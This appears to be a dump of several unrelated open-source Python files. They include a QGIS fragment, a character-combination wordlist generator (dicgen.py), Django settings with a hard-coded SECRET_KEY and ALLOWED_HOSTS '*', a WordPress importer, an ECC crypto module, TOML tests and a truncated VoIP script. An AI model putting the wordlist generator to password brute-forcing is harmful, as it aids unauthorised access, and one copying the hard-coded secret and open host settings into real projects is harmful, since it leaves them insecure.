def undoMaterializationFromDatabase(self, abstractDb, propertyName, settingType, edgvVersion):
"""
Method that is reimplemented in each child when uninstalling a property involves changing any sort of database structure
"""
jsonDict = self.utils.instantiateJsonDict(abstractDb.getRecordFromAdminDb(settingType, propertyName, edgvVersion)['jsondict'])
abstractDb.dropCentroids(list(jsonDict['earthCoverageDict'].keys()), useTransaction = False)
def hasStructuralChanges(self, dbNameList):
"""
Method that is reimplemented in each child
"""
structuralChanges = []
for dbName in dbNameList:
abstractDb = self.instantiateAbstractDb(dbName)
if abstractDb.checkCentroidAuxStruct():
structuralChanges.append(dbName)
return structuralChanges
| gpl-2.0 | -2,215,078,940,906,647,600 | 48.364865 | 134 | 0.594032 | false |
ualvesdias/dicgen | dicgen.py | 1 | 2243 | #!/usr/bin/env python
import itertools as it
import sys
import progressbar as pb
from time import time, ctime
# The generator itself
def generator(string,minLen,maxLen,prevCount):
count = 0
bar = pb.ProgressBar(maxval = prevCount).start()
# This for loops from the min length to the max
for length in range(minLen,maxLen+1):
# This for computes each combination and writes it into the file
for perm in it.product(string, repeat=length):
outFile.write(str(''.join(perm)))
outFile.write('\n')
count += 1
bar.update(count)
# The main function. It shows the number of lines
# that will be created, as well as the file size.
# It also calls the generator and shows the result on the screen.
def main():
# var declarations
global outputFile, outFile
prevCount = 0
prevSize = 0
# Calculates the preview numbers
for ln in range(minLen, maxLen+1):
prevCount += len(string)**ln
        prevSize += len(string)**ln * (ln + 1)  # bytes for words of this length plus the trailing newline
# Filesize in MB, GB and PB
mByte = prevSize / (1024**2)
gByte = mByte / 1024
tByte = gByte / 1024
pByte = tByte / 1024
print("Attention!")
print("Size in MB: %.2f" % mByte)
print("Size in GB: %.2f" % gByte)
print("Size in TB: %.2f" % tByte)
print("Size in PB: %.2f" % pByte)
print("\ndicgen is about to generate a file with %i lines." % prevCount)
while True:
# Confirmation
proceed = raw_input('Are you sure you want to proceed?\n[Y]es [N]o: ')
if proceed.lower() == 'y' or proceed.lower() == 'yes':
print("Initiating operation...")
outFile = open(outputFile,'w')
startTime = time()
print("Start time: %s" % ctime(startTime))
generator(string,minLen,maxLen,prevCount)
endTime = time()
print("Done.\nEnd time: %s" % ctime(endTime))
print("Total operation time: %.2f seconds." % (float(endTime - startTime)))
print("The file %s is ready to be used." % outputFile)
break
elif proceed.lower() == 'n' or proceed.lower() == 'no':
print('Aborting...')
break
else:
print('Please, type yes or no.')
if __name__ == "__main__":
try:
string = sys.argv[1]
minLen = int(sys.argv[2])
maxLen = int(sys.argv[3])
outputFile = sys.argv[4]
except:
print("Usage: python dicgen.py <characters> <min-range> <max-range> <output-file>")
sys.exit(1)
main()
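# Illustrative example (not part of the original script): running
#   python dicgen.py abc 1 2 wordlist.txt
# writes every combination of 'a', 'b', 'c' of lengths 1 and 2, i.e.
# 3**1 + 3**2 = 12 lines ("a", "b", ..., "cc"), which is exactly the
# prevCount preview computed in main() before the confirmation prompt.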
| gpl-3.0 | 6,836,051,558,800,038,000 | 28.12987 | 85 | 0.666964 | false |
krstnschwpwr/speedcontrol | speed_ctrl/settings.py | 1 | 2616 | import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'jfwya!*^^@unv%s$-#-#us9x6z%1ym!uvspde2zu#unrp&(gos'
if 'SPEEDTRACKER_ENV' in os.environ and os.environ['SPEEDTRACKER_ENV'] == 'production':
DEBUG = False
ALLOWED_HOSTS = ['*']
else:
DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = [
'probe.apps.ProbeConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'speed_ctrl.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'probe/templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'speed_ctrl.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'speed.sqlite'),
}
}
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'probe.renderers.PrtgRenderer',
'rest_framework.renderers.JSONRenderer',
)
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
| mit | -2,287,553,738,804,210,000 | 25.424242 | 91 | 0.652905 | false |
virginiacc/owning-a-home | src/_lib/wordpress_journey_processor.py | 1 | 2377 | import sys
import json
import os.path
import requests
import dateutil.parser
def posts_at_url(url):
current_page = 1
max_page = sys.maxint
while current_page <= max_page:
url = os.path.expandvars(url)
resp = requests.get(url, params={'page':current_page, 'count': '-1'})
results = json.loads(resp.content)
current_page += 1
max_page = results['pages']
for p in results['posts']:
yield p
def documents(name, url, **kwargs):
for post in posts_at_url(url):
yield process_journey(post)
def process_journey(item):
del item['comments']
del item['date']
custom_fields = item['custom_fields']
item['_id'] = item['slug']
if item['parent'] != 0:
# This is a step item
item['has_parent'] = True
if custom_fields.get('what_to_know'):
item['what_to_know'] = custom_fields['what_to_know'][0]
if custom_fields.get('how_to_take_action'):
item['how_to_take_action'] = \
custom_fields['how_to_take_action'][0]
if custom_fields.get('key_tool'):
key_tool = {}
key_tool['url'] = custom_fields['key_tool'][0]
key_tool['text'] = custom_fields['key_tool'][1]
item['key_tool'] = key_tool
else:
# This is a phase item
item['has_parent'] = False
# create list of tools
item['tools'] = []
for x in xrange(0,2):
tool = {}
fields = ['description', 'link']
for field in fields:
field_name = 'tools_%s_%s' % (str(x), field)
if field_name in custom_fields:
if field == 'link':
tool['url'] = custom_fields[field_name][0]
tool['text'] = custom_fields[field_name][1]
else:
tool[field] = custom_fields[field_name][0]
if tool:
item['tools'].append(tool)
# create list of milestones
milestones = []
for x in xrange(0,3):
key = 'milestones_%s_milestone' % x
if key in custom_fields:
milestones.append(custom_fields[key][0])
if milestones:
item['milestones'] = milestones
return item
| cc0-1.0 | 1,026,639,759,227,327,500 | 28.7125 | 77 | 0.506521 | false |
bashrc/zeronet-debian | src/src/lib/pyelliptic/ecc.py | 1 | 18500 | #!/usr/bin/python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 Yann GUIBET <[email protected]>
# See LICENSE for details.
from hashlib import sha512
from .openssl import OpenSSL
from .cipher import Cipher
from .hash import hmac_sha256, equals
from struct import pack, unpack
class ECC:
"""
Asymmetric encryption with Elliptic Curve Cryptography (ECC)
ECDH, ECDSA and ECIES
import pyelliptic
alice = pyelliptic.ECC() # default curve: sect283r1
bob = pyelliptic.ECC(curve='sect571r1')
ciphertext = alice.encrypt("Hello Bob", bob.get_pubkey())
print bob.decrypt(ciphertext)
signature = bob.sign("Hello Alice")
# alice's job :
print pyelliptic.ECC(
pubkey=bob.get_pubkey()).verify(signature, "Hello Alice")
# ERROR !!!
try:
key = alice.get_ecdh_key(bob.get_pubkey())
except: print("For ECDH key agreement,\
the keys must be defined on the same curve !")
alice = pyelliptic.ECC(curve='sect571r1')
print alice.get_ecdh_key(bob.get_pubkey()).encode('hex')
print bob.get_ecdh_key(alice.get_pubkey()).encode('hex')
"""
def __init__(self, pubkey=None, privkey=None, pubkey_x=None,
pubkey_y=None, raw_privkey=None, curve='sect283r1'):
"""
        For normal, high level use, specify pubkey,
        privkey (if you need it) and the curve
"""
if type(curve) == str:
self.curve = OpenSSL.get_curve(curve)
else:
self.curve = curve
if pubkey_x is not None and pubkey_y is not None:
self._set_keys(pubkey_x, pubkey_y, raw_privkey)
elif pubkey is not None:
curve, pubkey_x, pubkey_y, i = ECC._decode_pubkey(pubkey)
if privkey is not None:
curve2, raw_privkey, i = ECC._decode_privkey(privkey)
if curve != curve2:
raise Exception("Bad ECC keys ...")
self.curve = curve
self._set_keys(pubkey_x, pubkey_y, raw_privkey)
else:
self.privkey, self.pubkey_x, self.pubkey_y = self._generate()
def _set_keys(self, pubkey_x, pubkey_y, privkey):
if self.raw_check_key(privkey, pubkey_x, pubkey_y) < 0:
self.pubkey_x = None
self.pubkey_y = None
self.privkey = None
raise Exception("Bad ECC keys ...")
else:
self.pubkey_x = pubkey_x
self.pubkey_y = pubkey_y
self.privkey = privkey
@staticmethod
def get_curves():
"""
static method, returns the list of all the curves available
"""
return OpenSSL.curves.keys()
def get_curve(self):
return OpenSSL.get_curve_by_id(self.curve)
def get_curve_id(self):
return self.curve
def get_pubkey(self):
"""
High level function which returns :
curve(2) + len_of_pubkeyX(2) + pubkeyX + len_of_pubkeyY + pubkeyY
"""
return b''.join((pack('!H', self.curve),
pack('!H', len(self.pubkey_x)),
self.pubkey_x,
pack('!H', len(self.pubkey_y)),
self.pubkey_y
))
def get_privkey(self):
"""
High level function which returns
curve(2) + len_of_privkey(2) + privkey
"""
return b''.join((pack('!H', self.curve),
pack('!H', len(self.privkey)),
self.privkey
))
@staticmethod
def _decode_pubkey(pubkey):
i = 0
curve = unpack('!H', pubkey[i:i + 2])[0]
i += 2
tmplen = unpack('!H', pubkey[i:i + 2])[0]
i += 2
pubkey_x = pubkey[i:i + tmplen]
i += tmplen
tmplen = unpack('!H', pubkey[i:i + 2])[0]
i += 2
pubkey_y = pubkey[i:i + tmplen]
i += tmplen
return curve, pubkey_x, pubkey_y, i
@staticmethod
def _decode_privkey(privkey):
i = 0
curve = unpack('!H', privkey[i:i + 2])[0]
i += 2
tmplen = unpack('!H', privkey[i:i + 2])[0]
i += 2
privkey = privkey[i:i + tmplen]
i += tmplen
return curve, privkey, i
def _generate(self):
try:
pub_key_x = OpenSSL.BN_new()
pub_key_y = OpenSSL.BN_new()
key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
if (OpenSSL.EC_KEY_generate_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_generate_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
priv_key = OpenSSL.EC_KEY_get0_private_key(key)
group = OpenSSL.EC_KEY_get0_group(key)
pub_key = OpenSSL.EC_KEY_get0_public_key(key)
if (OpenSSL.EC_POINT_get_affine_coordinates_GFp(group, pub_key,
pub_key_x,
pub_key_y, 0
)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_get_affine_coordinates_GFp FAIL ...")
privkey = OpenSSL.malloc(0, OpenSSL.BN_num_bytes(priv_key))
pubkeyx = OpenSSL.malloc(0, OpenSSL.BN_num_bytes(pub_key_x))
pubkeyy = OpenSSL.malloc(0, OpenSSL.BN_num_bytes(pub_key_y))
OpenSSL.BN_bn2bin(priv_key, privkey)
privkey = privkey.raw
OpenSSL.BN_bn2bin(pub_key_x, pubkeyx)
pubkeyx = pubkeyx.raw
OpenSSL.BN_bn2bin(pub_key_y, pubkeyy)
pubkeyy = pubkeyy.raw
self.raw_check_key(privkey, pubkeyx, pubkeyy)
return privkey, pubkeyx, pubkeyy
finally:
OpenSSL.EC_KEY_free(key)
OpenSSL.BN_free(pub_key_x)
OpenSSL.BN_free(pub_key_y)
def get_ecdh_key(self, pubkey):
"""
        High level function. Combines the given public key with the local
        private key (ECDH) and returns a 512-bit shared key
"""
curve, pubkey_x, pubkey_y, i = ECC._decode_pubkey(pubkey)
if curve != self.curve:
raise Exception("ECC keys must be from the same curve !")
return sha512(self.raw_get_ecdh_key(pubkey_x, pubkey_y)).digest()
def raw_get_ecdh_key(self, pubkey_x, pubkey_y):
try:
ecdh_keybuffer = OpenSSL.malloc(0, 32)
other_key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if other_key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
other_pub_key_x = OpenSSL.BN_bin2bn(pubkey_x, len(pubkey_x), 0)
other_pub_key_y = OpenSSL.BN_bin2bn(pubkey_y, len(pubkey_y), 0)
other_group = OpenSSL.EC_KEY_get0_group(other_key)
other_pub_key = OpenSSL.EC_POINT_new(other_group)
if (OpenSSL.EC_POINT_set_affine_coordinates_GFp(other_group,
other_pub_key,
other_pub_key_x,
other_pub_key_y,
0)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_set_affine_coordinates_GFp FAIL ...")
if (OpenSSL.EC_KEY_set_public_key(other_key, other_pub_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_public_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(other_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
own_key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if own_key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
own_priv_key = OpenSSL.BN_bin2bn(
self.privkey, len(self.privkey), 0)
if (OpenSSL.EC_KEY_set_private_key(own_key, own_priv_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_private_key FAIL ...")
OpenSSL.ECDH_set_method(own_key, OpenSSL.ECDH_OpenSSL())
ecdh_keylen = OpenSSL.ECDH_compute_key(
ecdh_keybuffer, 32, other_pub_key, own_key, 0)
if ecdh_keylen != 32:
raise Exception("[OpenSSL] ECDH keylen FAIL ...")
return ecdh_keybuffer.raw
finally:
OpenSSL.EC_KEY_free(other_key)
OpenSSL.BN_free(other_pub_key_x)
OpenSSL.BN_free(other_pub_key_y)
OpenSSL.EC_POINT_free(other_pub_key)
OpenSSL.EC_KEY_free(own_key)
OpenSSL.BN_free(own_priv_key)
def check_key(self, privkey, pubkey):
"""
        Check the public key and the private key.
        The private key is optional (pass None instead)
"""
curve, pubkey_x, pubkey_y, i = ECC._decode_pubkey(pubkey)
if privkey is None:
raw_privkey = None
curve2 = curve
else:
curve2, raw_privkey, i = ECC._decode_privkey(privkey)
if curve != curve2:
raise Exception("Bad public and private key")
return self.raw_check_key(raw_privkey, pubkey_x, pubkey_y, curve)
def raw_check_key(self, privkey, pubkey_x, pubkey_y, curve=None):
if curve is None:
curve = self.curve
elif type(curve) == str:
curve = OpenSSL.get_curve(curve)
else:
curve = curve
try:
key = OpenSSL.EC_KEY_new_by_curve_name(curve)
if key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
if privkey is not None:
priv_key = OpenSSL.BN_bin2bn(privkey, len(privkey), 0)
pub_key_x = OpenSSL.BN_bin2bn(pubkey_x, len(pubkey_x), 0)
pub_key_y = OpenSSL.BN_bin2bn(pubkey_y, len(pubkey_y), 0)
if privkey is not None:
if (OpenSSL.EC_KEY_set_private_key(key, priv_key)) == 0:
raise Exception(
"[OpenSSL] EC_KEY_set_private_key FAIL ...")
group = OpenSSL.EC_KEY_get0_group(key)
pub_key = OpenSSL.EC_POINT_new(group)
if (OpenSSL.EC_POINT_set_affine_coordinates_GFp(group, pub_key,
pub_key_x,
pub_key_y,
0)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_set_affine_coordinates_GFp FAIL ...")
if (OpenSSL.EC_KEY_set_public_key(key, pub_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_public_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
return 0
finally:
OpenSSL.EC_KEY_free(key)
OpenSSL.BN_free(pub_key_x)
OpenSSL.BN_free(pub_key_y)
OpenSSL.EC_POINT_free(pub_key)
if privkey is not None:
OpenSSL.BN_free(priv_key)
def sign(self, inputb, digest_alg=OpenSSL.EVP_ecdsa):
"""
Sign the input with ECDSA method and returns the signature
"""
try:
size = len(inputb)
buff = OpenSSL.malloc(inputb, size)
digest = OpenSSL.malloc(0, 64)
md_ctx = OpenSSL.EVP_MD_CTX_create()
dgst_len = OpenSSL.pointer(OpenSSL.c_int(0))
siglen = OpenSSL.pointer(OpenSSL.c_int(0))
sig = OpenSSL.malloc(0, 151)
key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
priv_key = OpenSSL.BN_bin2bn(self.privkey, len(self.privkey), 0)
pub_key_x = OpenSSL.BN_bin2bn(self.pubkey_x, len(self.pubkey_x), 0)
pub_key_y = OpenSSL.BN_bin2bn(self.pubkey_y, len(self.pubkey_y), 0)
if (OpenSSL.EC_KEY_set_private_key(key, priv_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_private_key FAIL ...")
group = OpenSSL.EC_KEY_get0_group(key)
pub_key = OpenSSL.EC_POINT_new(group)
if (OpenSSL.EC_POINT_set_affine_coordinates_GFp(group, pub_key,
pub_key_x,
pub_key_y,
0)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_set_affine_coordinates_GFp FAIL ...")
if (OpenSSL.EC_KEY_set_public_key(key, pub_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_public_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
OpenSSL.EVP_MD_CTX_init(md_ctx)
OpenSSL.EVP_DigestInit_ex(md_ctx, digest_alg(), None)
if (OpenSSL.EVP_DigestUpdate(md_ctx, buff, size)) == 0:
raise Exception("[OpenSSL] EVP_DigestUpdate FAIL ...")
OpenSSL.EVP_DigestFinal_ex(md_ctx, digest, dgst_len)
OpenSSL.ECDSA_sign(0, digest, dgst_len.contents, sig, siglen, key)
if (OpenSSL.ECDSA_verify(0, digest, dgst_len.contents, sig,
siglen.contents, key)) != 1:
raise Exception("[OpenSSL] ECDSA_verify FAIL ...")
return sig.raw[:siglen.contents.value]
finally:
OpenSSL.EC_KEY_free(key)
OpenSSL.BN_free(pub_key_x)
OpenSSL.BN_free(pub_key_y)
OpenSSL.BN_free(priv_key)
OpenSSL.EC_POINT_free(pub_key)
OpenSSL.EVP_MD_CTX_destroy(md_ctx)
def verify(self, sig, inputb, digest_alg=OpenSSL.EVP_ecdsa):
"""
Verify the signature with the input and the local public key.
Returns a boolean
"""
try:
bsig = OpenSSL.malloc(sig, len(sig))
binputb = OpenSSL.malloc(inputb, len(inputb))
digest = OpenSSL.malloc(0, 64)
dgst_len = OpenSSL.pointer(OpenSSL.c_int(0))
md_ctx = OpenSSL.EVP_MD_CTX_create()
key = OpenSSL.EC_KEY_new_by_curve_name(self.curve)
if key == 0:
raise Exception("[OpenSSL] EC_KEY_new_by_curve_name FAIL ...")
pub_key_x = OpenSSL.BN_bin2bn(self.pubkey_x, len(self.pubkey_x), 0)
pub_key_y = OpenSSL.BN_bin2bn(self.pubkey_y, len(self.pubkey_y), 0)
group = OpenSSL.EC_KEY_get0_group(key)
pub_key = OpenSSL.EC_POINT_new(group)
if (OpenSSL.EC_POINT_set_affine_coordinates_GFp(group, pub_key,
pub_key_x,
pub_key_y,
0)) == 0:
raise Exception(
"[OpenSSL] EC_POINT_set_affine_coordinates_GFp FAIL ...")
if (OpenSSL.EC_KEY_set_public_key(key, pub_key)) == 0:
raise Exception("[OpenSSL] EC_KEY_set_public_key FAIL ...")
if (OpenSSL.EC_KEY_check_key(key)) == 0:
raise Exception("[OpenSSL] EC_KEY_check_key FAIL ...")
OpenSSL.EVP_MD_CTX_init(md_ctx)
OpenSSL.EVP_DigestInit_ex(md_ctx, digest_alg(), None)
if (OpenSSL.EVP_DigestUpdate(md_ctx, binputb, len(inputb))) == 0:
raise Exception("[OpenSSL] EVP_DigestUpdate FAIL ...")
OpenSSL.EVP_DigestFinal_ex(md_ctx, digest, dgst_len)
ret = OpenSSL.ECDSA_verify(
0, digest, dgst_len.contents, bsig, len(sig), key)
if ret == -1:
return False # Fail to Check
else:
if ret == 0:
return False # Bad signature !
else:
return True # Good
return False
finally:
OpenSSL.EC_KEY_free(key)
OpenSSL.BN_free(pub_key_x)
OpenSSL.BN_free(pub_key_y)
OpenSSL.EC_POINT_free(pub_key)
OpenSSL.EVP_MD_CTX_destroy(md_ctx)
@staticmethod
def encrypt(data, pubkey, ephemcurve=None, ciphername='aes-256-cbc'):
"""
Encrypt data with ECIES method using the public key of the recipient.
"""
curve, pubkey_x, pubkey_y, i = ECC._decode_pubkey(pubkey)
return ECC.raw_encrypt(data, pubkey_x, pubkey_y, curve=curve,
ephemcurve=ephemcurve, ciphername=ciphername)
@staticmethod
def raw_encrypt(data, pubkey_x, pubkey_y, curve='sect283r1',
ephemcurve=None, ciphername='aes-256-cbc'):
if ephemcurve is None:
ephemcurve = curve
ephem = ECC(curve=ephemcurve)
key = sha512(ephem.raw_get_ecdh_key(pubkey_x, pubkey_y)).digest()
key_e, key_m = key[:32], key[32:]
pubkey = ephem.get_pubkey()
iv = OpenSSL.rand(OpenSSL.get_cipher(ciphername).get_blocksize())
ctx = Cipher(key_e, iv, 1, ciphername)
ciphertext = iv + pubkey + ctx.ciphering(data)
mac = hmac_sha256(key_m, ciphertext)
return ciphertext + mac
def decrypt(self, data, ciphername='aes-256-cbc'):
"""
Decrypt data with ECIES method using the local private key
"""
blocksize = OpenSSL.get_cipher(ciphername).get_blocksize()
iv = data[:blocksize]
i = blocksize
curve, pubkey_x, pubkey_y, i2 = ECC._decode_pubkey(data[i:])
i += i2
ciphertext = data[i:len(data)-32]
i += len(ciphertext)
mac = data[i:]
key = sha512(self.raw_get_ecdh_key(pubkey_x, pubkey_y)).digest()
key_e, key_m = key[:32], key[32:]
if not equals(hmac_sha256(key_m, data[:len(data) - 32]), mac):
raise RuntimeError("Fail to verify data")
ctx = Cipher(key_e, iv, 0, ciphername)
return ctx.ciphering(ciphertext)
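# Minimal usage sketch (illustrative only; variable names and the message are
# examples, mirroring the class docstring): ECDH key agreement and an ECIES
# encrypt/decrypt round trip between two keys on the same curve.
#
#   alice = ECC(curve='sect283r1')
#   bob = ECC(curve='sect283r1')
#   shared = alice.get_ecdh_key(bob.get_pubkey())         # 512-bit shared secret
#   assert shared == bob.get_ecdh_key(alice.get_pubkey())
#   ciphertext = ECC.encrypt(b"Hello Bob", bob.get_pubkey())
#   assert bob.decrypt(ciphertext) == b"Hello Bob"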
| gpl-2.0 | -4,182,418,134,125,974,000 | 39.130152 | 79 | 0.517622 | false |
drgarcia1986/simple-settings | tests/strategies/test_toml.py | 1 | 1306 | import pytest
skip = False
try:
from simple_settings.strategies.toml_file import SettingsLoadStrategyToml
except ImportError:
skip = True
@pytest.mark.skipif(skip, reason='Installed without Toml')
class TestTomlStrategy:
@pytest.fixture
def strategy_toml(self):
return SettingsLoadStrategyToml
def test_should_check_a_valid_toml_file(self, strategy_toml):
assert strategy_toml.is_valid_file('foo.toml') is True
def test_should_check_a_invalid_toml_file(self, strategy_toml):
assert strategy_toml.is_valid_file('foo.bar') is False
def test_should_load_dict_with_settings_of_toml_file(self, strategy_toml):
settings = strategy_toml.load_settings_file(
'tests/samples/simple_toml_file.toml'
)
assert settings['SIMPLE_STRING'] == 'simple'
assert settings['COMPLEX_DICT'] == {'complex': 'dict', 'foo': 'bar'}
assert settings['COMPLEX_LIST'] == ['foo', 'bar']
assert settings['SIMPLE_INTEGER'] == 1
assert settings['SIMPLE_BOOL'] is True
def test_should_raise_error_invalid_toml_file_content(self, strategy_toml):
with pytest.raises(Exception):
settings = strategy_toml.load_settings_file(
'tests/samples/invalid_toml_file.toml'
)
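# For reference only: a TOML document consistent with the assertions in
# test_should_load_dict_with_settings_of_toml_file would look like the sketch
# below (the actual sample file shipped with the tests may be laid out
# differently):
#
#   SIMPLE_STRING = "simple"
#   SIMPLE_INTEGER = 1
#   SIMPLE_BOOL = true
#   COMPLEX_LIST = ["foo", "bar"]
#
#   [COMPLEX_DICT]
#   complex = "dict"
#   foo = "bar"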
| mit | -2,855,346,663,281,709,600 | 33.368421 | 79 | 0.663859 | false |
javidombro/CGR | voip_p2p.py | 1 | 7182 | #!/usr/bin/env python3
import pyaudio
import socket
import sys
import zlib
import time
import threading
from threading import Thread
import argparse
import audioop
from threading import Timer
import RPi.GPIO as gpio
dicIPSO = {} # Dictionary mapping IP -> output stream
recordEvent = threading.Event()
clientEvent = threading.Event()
exitFlag = False
debug = True
squelch = False
squelchValue = 0
mask_tx = ""
mask_rx = []
IP = ""
IPBroadcast = "255.255.255.255"
addr = ""
ptt_timer = ""
gpioEnable = False
port = ""
FORMAT = pyaudio.paInt16
CHUNK = 2205
CHANNELS = 1
RATE = 44100
udp = ""
pi = pyaudio.PyAudio()
streamInput = ""
def pdebug(tPrint):
global debug
if debug:
print(tPrint)
def exitVoip():
global exitFlag
exitFlag = True
def set_squelch(pValue):
global squelchValue
squelchValue = pValue
pdebug("Squelch seteado a: "+ str(squelchValue))
def squelch_on():
global squelch
squelch = True
pdebug("Squelch Encendido")
def squelch_off():
global squelch
squelch = False
pdebug("Squelch Apagado")
def squelch_toggle():
global squelch
if squelch:
squelch_off()
else:
squelch_on()
def sel_masc_rx(pMask_rx):
global mask_rx
if not (pMask_rx in mask_rx):
mask_rx.append(pMask_rx)
pdebug("Mascara de Recepcion "+ pMask_rx.decode("utf-8") + " agregada")
def desel_masc_rx(pMask_rx):
global mask_rx
if pMask_rx in mask_rx:
mask_rx.remove(pMask_rx)
pdebug("Mascara de Recepcion " + pMask_rx.decode("utf-8") + " removida")
def sel_masc_tx(pMask_tx):
global mask_tx
mask_tx = pMask_tx
pdebug("Mascara de Transmision seteada a: " + pMask_tx.decode("utf-8"))
def set_IP(pIP):
global IP
IP = pIP
pdebug("IP Seteada a: " + pIP)
def get_masc_rx():
return mask_rx
def getStreamOutput(IPP):
    # IPP = IP parameter
    # Returns the StreamOutput associated with the IP; if it does not exist, creates it and launches a Thread associated with that stream
if IPP in dicIPSO:
return(dicIPSO[IPP])
else:
po = pyaudio.PyAudio()
streamOutput = po.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
output=True,
frames_per_buffer=CHUNK
)
        dicIPSO[IPP] = streamOutput # Map the IP to the StreamOutput
return(streamOutput)
#Server Methods
def tServer(CHUNK):
global exitFlag
global IP
global mask_rx
global ptt_timer
global gpioEnable
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(('', port))
iprecive = ""
silence = chr(0)*2
while (not exitFlag):
try:
udpData, addr = udp.recvfrom(CHUNK+8)
iprecive = addr[0]
compMascara = udpData[:8]
if (not(iprecive == IP) and (compMascara in mask_rx)):
if gpioEnable:
                    # Activate the VHF PTT
ptt_timer.cancel()
ptt_timer = Timer(1.0,timeout)
ptt_timer.start()
gpio.output(18,True)
encSoundData = udpData[8:]
                # Decode the audio
soundData = audioop.alaw2lin(encSoundData,2)
                # get the output stream corresponding to the IP
so = getStreamOutput(iprecive)
so.write(soundData,CHUNK)
#print(silence)
free = so.get_write_available() # How much space is left in the buffer?
#print(free)
if free > CHUNK: # Is there a lot of space in the buffer?
tofill = free - CHUNK
so.write(silence * tofill) # Fill it with silence
except:
pass
udp.close()
def enableGPIO():
global gpioEnable
gpio.setmode(gpio.BCM)
gpio.setup(18,gpio.OUT)
gpioEnable = True
def disableGPIO():
global gpioEnable
gpioEnable = False
def callbackInput(in_data, frame_count, time_info, status):
global udp
global clientEvent
global streamInput
audio = in_data
encSoundData = audioop.lin2alaw(audio,2)
    # Add the mask (the mask MUST be a bytearray)
tosend = bytearray()
tosend.extend(mask_tx)
tosend.extend(encSoundData)
ids = str(len(in_data))
fcs = str(frame_count)
#print("INDATA = "+ids)
#print("FRAMECOUNT = "+ fcs)
#print("MANDANDO")
udp.sendto(tosend, (IPBroadcast, port))
return (audio, pyaudio.paContinue)
def ptt_on():
global streamInput
streamInput.start_stream()
pdebug("PTT Presionado")
#print("Despertar Thread Record")
def ptt_on(ip):
global streamInput
global IPBroadcast
streamInput.start_stream()
pdebug("PTT Presionado")
IPBroadcast = ip
# print("Despertar Thread Record")
def ptt_off():
global streamInput
streamInput.stop_stream()
pdebug("PTT Liberado")
def faltante():
if (IP == ""):
return("IP")
else:
if(mask_tx == ""):
return("Mascara de Transmision")
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 0))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
def timeout():
global ptt_timer
gpio.output(18,False)
def start(setgpioEnable=False):
global IP
global streamInput
global udp
global ptt_timer
global gpioEnable
global port
gpioEnable = setgpioEnable
if not gpioEnable:
pdebug("VOIP en modo CLIENTE")
else:
pdebug("VOIP en modo Conexion GPIO")
port = 50001
IP = get_ip()
sel_masc_tx(b'\x00\x00\x00\x00\x00\x00\x00\x01')
sel_masc_rx(b'\x00\x00\x00\x00\x00\x00\x00\x01')
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
